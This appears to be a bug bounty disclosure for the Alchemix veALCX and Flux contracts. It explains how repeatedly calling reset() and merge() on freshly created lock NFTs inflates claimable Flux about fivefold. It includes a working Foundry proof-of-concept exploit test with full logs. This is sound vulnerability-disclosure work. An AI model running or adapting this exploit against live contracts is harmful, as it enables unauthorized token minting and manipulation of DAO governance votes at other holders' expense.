Manipulation of governance voting result deviating from voted outcome and resulting in a direct change from intended effect of original results
Description
Description
Brief/Intro
Flux token implements a standard ERC20 token with extra features. Flux tokens are accrued by users of VotingEscrow when voting in the contract Voter. Flux tokens can be used to: i) exit a ve-position early by paying a penalty fee when calling function startCooldown, ii) boost voting power of a NFT holder in contract Voter, or iii) as a normal ERC20 token that can be traded in other systems.
So Flux tokens can be used to boost the voting power of a NFT holder. It is shown in the code of vote() function as below.
functionclaimableFlux(uint256_tokenId) publicviewreturns (uint256) {// If the lock is expired, no flux is claimable at the current epochif (block.timestamp > locked[_tokenId].end) {return0; }// Amount of flux claimable is <fluxPerVeALCX> percent of the balancereturn (_balanceOfTokenAt(_tokenId, block.timestamp) * fluxPerVeALCX) / BPS; }
So according to the design of the Alchemix DAO system, if an user have a locked tokenID then with balanceA then the user can get maximum Fluxtoken for 1 epoch is
Now an attacker can mint the several times bigger than the amount of Flux Token for 1 epoch intended by Alchemix by the using the same amount of capital.
So if an user have locked 10 * 10 ** 18 BPT token for 2 weeks, then the maximal amount of flux tokens can be claimed is:
Attacker can manipulate the system to mint several times to receive about more this amount in 1 epoch. I can demonstrate in the POC, the attacker was able to mint 5 times of the intended amount.
By doing so, the attacker can use the Flux token as boost to manipulate the governance voting result by calling the Vote() in Voter contract. Or the attacker can use the unclaimed Flux to mint Flux token.
How to accomplish the exploit of minting?
With an capital (for example 10 * 10 ** 18) The attacker can mint 10 tokenIDs with each lock 10**18 of BPT
The attacker can call the function reset() and merge()
So now if the attacker call reset(tokenId2) to accrue the unclaimFlux
The unclaimFlux will be
unclaimedFlux[tokenId2] += unclaimedFlux[tokenId1] + balanceTokenId2 * K = balanceTokenId1 * K + (balanceTokenId1 + balanceTokenId2) * K = 3 * balanceTokenId1
So you can see that after first loop, the unclaimedFlux is increased abnormally.
By repeating this loop, the attacker will be able to get several times bigger amount of Flux token. In the POC, I demontrated that the attacker can get 5 times bigger by repeating this loop 9 times.
Impacts
About the severity assessment
The impact is that the attacker will be able to exploit the system to get several times bigger Flux token for the same capital. For example, in the POC, the attacker can get 5 times bigger with the same capital.
Since the Flux tokens can be used to boost the Voting power in Vote function, the the boost can manipulate the governance voting result. The attacker can also mint Flux token to get benefit as the Flux token can be traded for other assets as stated by the protocol document.
The severity: Critial
Category:
Manipulation of governance voting result deviating from voted outcome and resulting in a direct change from intended effect of original results
Unauthorized or malicious minting of Flux token
Capital for the attack: Gas to execute the transactions. Amount of BPT can be big, the the bigger amount of Flux tokens can be minted, manipulated.
Easy to exploit and easy to be automated.
Proof of concept
Proof of concept
The POC code:
functiontestFluxAccrualUnlimited_Hacked() public {address attacker =address(this); console2.log("Start to create 4 tokenIds by calling createLock with _maxLockEnabled is false and value is 1e18 BPT");
uint index =0; uint count =9; uint256 tokenId1; uint256 tokenId2; uint256 unclaimedFlux; tokenId1 =createVeAlcx(attacker, TOKEN_1,2weeks,false);for (index =0; index < count; ++index ) { console2.log("index: %s", index); console2.log("Call voter.reset(tokenId1)"); voter.reset(tokenId1); unclaimedFlux = flux.getUnclaimedFlux(tokenId1); console2.log("unclaimedFlux of tokenId1: %s", unclaimedFlux); console2.log("Call veALCX.merge() to merge tokenId"); tokenId2 =createVeAlcx(attacker, TOKEN_1,2weeks,false); veALCX.merge(tokenId1, tokenId2); tokenId1 = tokenId2 ; } voter.reset(tokenId1); IVotingEscrow_1.LockedBalance memory _lock =IVotingEscrow_1(address(veALCX)).locked(tokenId1); console2.log("LockedBalance of tokenId1 lock.amount: %s ", _lock.amount); console2.log("LockedBalance of tokenId1 _lock.end: %s ", _lock.end); console2.log("LockedBalance of tokenId1 _lock.cooldown: %s ", _lock.end); console2.log("LockedBalance of tokenId1 _lock.maxLockEnabled: %s ", _lock.maxLockEnabled); unclaimedFlux = flux.getUnclaimedFlux(tokenId1); console2.log("unclaimedFlux of tokenId1: %s", unclaimedFlux); console2.log("After having unclaimFlux, attacker can use to boost voting power or mint Flux token"); console2.log("Flux token balance of the attacker: %s",flux.balanceOf(attacker)); console2.log("Call unclaimedFlux to mint Flux token for the attacker"); flux.claimFlux(tokenId1,unclaimedFlux); console2.log("After claiming: Flux token balance of the attacker: %s",flux.balanceOf(attacker)); }
In this POC, I use 10 * 10**18 BPT token. The attacker create 10 tokenIds and repeately call reset(tokenId) and merge
The log shows:
[PASS] testFluxAccrualUnlimited_Hacked() (gas: 9917085)
Logs:
Start to create 4 tokenIds by calling createLock with _maxLockEnabled is false and value is 1e18 BPT
index: 0
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 21621416793325425
Call veALCX.merge() to merge tokenId
index: 1
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 64864250380317202
Call veALCX.merge() to merge tokenId
index: 2
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 129728500760634405
Call veALCX.merge() to merge tokenId
index: 3
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 216214167934617960
Call veALCX.merge() to merge tokenId
index: 4
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 324321251901926940
Call veALCX.merge() to merge tokenId
index: 5
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 454049752662902272
Call veALCX.merge() to merge tokenId
index: 6
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 605399670217203030
Call veALCX.merge() to merge tokenId
index: 7
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 778371004565170140
Call veALCX.merge() to merge tokenId
index: 8
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 972963755706462675
Call veALCX.merge() to merge tokenId
LockedBalance of tokenId1 lock.amount: 10000000000000000000
LockedBalance of tokenId1 _lock.end: 1715817600
LockedBalance of tokenId1 _lock.cooldown: 1715817600
LockedBalance of tokenId1 _lock.maxLockEnabled: false
unclaimedFlux of tokenId1: 1189177923641421562
After having unclaimFlux, attacker can use to boost voting power or mint Flux token
Flux token balance of the attacker: 0
Call unclaimedFlux to mint Flux token for the attacker
After claiming: Flux token balance of the attacker: 1189177923641421562
So at the end of the attack: the attacker still have a tokenId with amount: 10000000000000000000 = 10 ** 18 Lock duration: 2 weeks.
So the attacker still can withdraw his capital of BPT token as normal.
The unclaimedFlux of tokenId1: 1189177923641421562
I also created the normal scenario where a user lock 10 ** 10**18 BPT token.
functiontestFluxAccrualUnlimited_Normal() public {address attacker =address(this); console2.log("Start to createLock with _maxLockEnabled is false and value is 1e18 BPT");uint256 tokenId1 =createVeAlcx(attacker,10*TOKEN_1,2weeks,false); IVotingEscrow_1.LockedBalance memory _lock =IVotingEscrow_1(address(veALCX)).locked(tokenId1); console2.log("LockedBalance of tokenId1 lock.amount: %s ", _lock.amount); console2.log("LockedBalance of tokenId1 _lock.end: %s ", _lock.end); console2.log("LockedBalance of tokenId1 _lock.cooldown: %s ", _lock.end); console2.log("LockedBalance of tokenId1 _lock.maxLockEnabled: %s ", _lock.maxLockEnabled); console2.log("Call voter.reset(tokenId1)"); voter.reset(tokenId1);uint256 unclaimedFlux = flux.getUnclaimedFlux(tokenId1); console2.log("unclaimedFlux1: %s", unclaimedFlux); console2.log("After having unclaimFlux, attacker can use to boost voting power or mint Flux token"); console2.log("Flux token balance of the attacker: %s",flux.balanceOf(attacker)); console2.log("Call unclaimedFlux to mint Flux token for the attacker"); flux.claimFlux(tokenId1,unclaimedFlux); console2.log("After claiming: Flux token balance of the attacker: %s",flux.balanceOf(attacker));uint256 maxVotePower = voter.maxVotingPower(tokenId1); console2.log("maxVotingPower of tokenId1 : %s ", maxVotePower); }
The log of this test case shows:
[PASS] testFluxAccrualUnlimited_Normal() (gas: 1310425)
Logs:
Start to createLock with _maxLockEnabled is false and value is 1e18 BPT
LockedBalance of tokenId1 lock.amount: 10000000000000000000
LockedBalance of tokenId1 _lock.end: 1715817600
LockedBalance of tokenId1 _lock.cooldown: 1715817600
LockedBalance of tokenId1 _lock.maxLockEnabled: false
Call voter.reset(tokenId1)
unclaimedFlux1: 216214167934958887
After having unclaimFlux, attacker can use to boost voting power or mint Flux token
Flux token balance of the attacker: 0
Call unclaimedFlux to mint Flux token for the attacker
After claiming: Flux token balance of the attacker: 216214167934958887
maxVotingPower of tokenId1 : 864856671739835550
So the unclaimedFlux1 of the tokenID1 is 216214167934958887
To compare, the attacker get 5 times bigger
1189177923641421562 / 216214167934958887 = 5
So attacker can use the gained Flux token to boost the voting power. In this POC, I demonstrated that the attacker can mint Flux token.
Flux token balance of the attacker: 0
Call unclaimedFlux to mint Flux token for the attacker
After claiming: Flux token balance of the attacker: 1189177923641421562
Ran 2 tests for src/test/VotingEscrow.t.sol:VotingEscrowTest
[PASS] testFluxAccrualUnlimited_Hacked() (gas: 9917085)
Logs:
Start to create 4 tokenIds by calling createLock with _maxLockEnabled is false and value is 1e18 BPT
index: 0
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 21621416793325425
Call veALCX.merge() to merge tokenId
index: 1
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 64864250380317202
Call veALCX.merge() to merge tokenId
index: 2
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 129728500760634405
Call veALCX.merge() to merge tokenId
index: 3
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 216214167934617960
Call veALCX.merge() to merge tokenId
index: 4
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 324321251901926940
Call veALCX.merge() to merge tokenId
index: 5
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 454049752662902272
Call veALCX.merge() to merge tokenId
index: 6
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 605399670217203030
Call veALCX.merge() to merge tokenId
index: 7
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 778371004565170140
Call veALCX.merge() to merge tokenId
index: 8
Call voter.reset(tokenId1)
unclaimedFlux of tokenId1: 972963755706462675
Call veALCX.merge() to merge tokenId
LockedBalance of tokenId1 lock.amount: 10000000000000000000
LockedBalance of tokenId1 _lock.end: 1715817600
LockedBalance of tokenId1 _lock.cooldown: 1715817600
LockedBalance of tokenId1 _lock.maxLockEnabled: false
unclaimedFlux of tokenId1: 1189177923641421562
After having unclaimFlux, attacker can use to boost voting power or mint Flux token
Flux token balance of the attacker: 0
Call unclaimedFlux to mint Flux token for the attacker
After claiming: Flux token balance of the attacker: 1189177923641421562
[PASS] testFluxAccrualUnlimited_Normal() (gas: 1310425)
Logs:
Start to createLock with _maxLockEnabled is false and value is 1e18 BPT
LockedBalance of tokenId1 lock.amount: 10000000000000000000
LockedBalance of tokenId1 _lock.end: 1715817600
LockedBalance of tokenId1 _lock.cooldown: 1715817600
LockedBalance of tokenId1 _lock.maxLockEnabled: false
Call voter.reset(tokenId1)
unclaimedFlux1: 216214167934958887
After having unclaimFlux, attacker can use to boost voting power or mint Flux token
Flux token balance of the attacker: 0
Call unclaimedFlux to mint Flux token for the attacker
After claiming: Flux token balance of the attacker: 216214167934958887
maxVotingPower of tokenId1 : 864856671739835550
Suite result: ok. 2 passed; 0 failed; 0 skipped; finished in 28.29ms (27.57ms CPU time)
Ran 1 test suite in 694.91ms (28.29ms CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
The full log file with debug: https://drive.google.com/file/d/1Zo_Osm4rcdqRBumhmvloZdqdzDuCU24f/view?usp=sharing